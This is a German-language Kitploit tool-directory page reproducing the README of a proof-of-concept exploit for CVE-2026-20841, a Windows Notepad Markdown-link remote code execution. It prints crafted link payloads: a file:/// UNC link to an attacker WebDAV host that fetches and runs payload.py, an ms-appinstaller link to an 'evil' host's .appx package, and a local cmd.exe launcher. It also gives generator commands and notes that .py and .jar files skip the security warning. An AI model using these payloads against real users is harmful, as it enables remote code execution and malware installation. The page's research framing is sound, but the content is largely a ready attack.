Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-20841 — Proof-of-Concept-Exploit für CVE-2026-20841, eine Windows-Notepad-RCE über Markdown-Links. Erzeugt manipulierte .md-Dateien, um Remote-Payloads, App-Sideloading oder die lokale Ausführung von Binärdateien auszulösen. | Kitploit
Tools/GitHubGitHub/atiilla/cve-2026-20841
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubatiilla/cve-2026-20841

CVE-2026-20841

Proof-of-Concept-Exploit für CVE-2026-20841, eine Windows-Notepad-RCE über Markdown-Links. Erzeugt manipulierte .md-Dateien, um Remote-Payloads, App-Sideloading oder die lokale Ausführung von Binärdateien auszulösen.

Repository anzeigen
546vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-20841 – Windows-Notepad-RCE

PoC für eine Schwachstelle zur Remote-Codeausführung im Markdown-Renderer von Windows Notepad. Die Markdown-Engine schränkt URL-Protokolle nicht ein, sodass über klickbare Links beliebige Protokoll-Handler ausgelöst werden können.

Haftungsausschlüsse

  1. Nicht meine Entdeckung. Die Anerkennung gebührt den ursprünglichen Forschern im MSRC-Advisory. Dies ist eine PoC-Nachbildung.
  2. Geringerer Schweregrad als es klingt. Erfordert in den meisten Fällen mehr als einen Klick (siehe Einschränkungen). Gebaut, weil „Notepad RCE“ zu witzig ist, um es auszulassen.

Angriffsvektoren

1. Remote-Payload (file:///)

root@kitploit:~
[click](file:///\\attacker@5005\DavWWWRoot\payload.py)

Das file:///-Protokoll löst entfernte UNC-Pfade auf. Verlinken Sie eine Payload und Windows holt sie sich und führt sie beim Klick aus.

2. App-Sideloading (ms-appinstaller://)

root@kitploit:~
[click](ms-appinstaller://?source=https://evil/xxx.appx)

Öffnet den App-Installer mit einem vom Angreifer bereitgestellten .appx/.msix-Paket.

3. Ausführung lokaler Binärdateien (file://)

root@kitploit:~
[click](file://C:/windows/system32/cmd.exe)

Startet jede bereits auf der Festplatte vorhandene ausführbare Datei – cmd.exe, powershell.exe, mshta.exe usw.

Verwendung

Beide Skripte erzeugen eine poc.md mit einem manipulierten Link im aktuellen Verzeichnis.

root@kitploit:~
node poc.js <host> <port> <payload/pfad>
python poc.py <host> <port> <payload/pfad>
root@kitploit:~
# Beispiel
node poc.js 192.168.1.100 5005 hello.py
notepad poc.md

Test-Payloads in payloads/.

Einschränkungen

  1. Gefährliche Erweiterungen werden weiterhin markiert. .exe, .lnk, .vbs und ähnliche lösen unabhängig vom Verhalten von Notepad eine Windows-Sicherheitswarnung aus.
  2. Interpreter-Erweiterungen umgehen die Warnung. .py und .jar werden still ausgeführt, wenn Python oder Java auf dem Zielsystem installiert ist.

Hinweise

  • Verwundbare Notepad-Builds sind auf Uptodown verfügbar. Überprüfen Sie vor der Verwendung die digitale Signatur.
  • Nur in einer VM testen.

Bleiben Sie sicher!

Tool herunterladen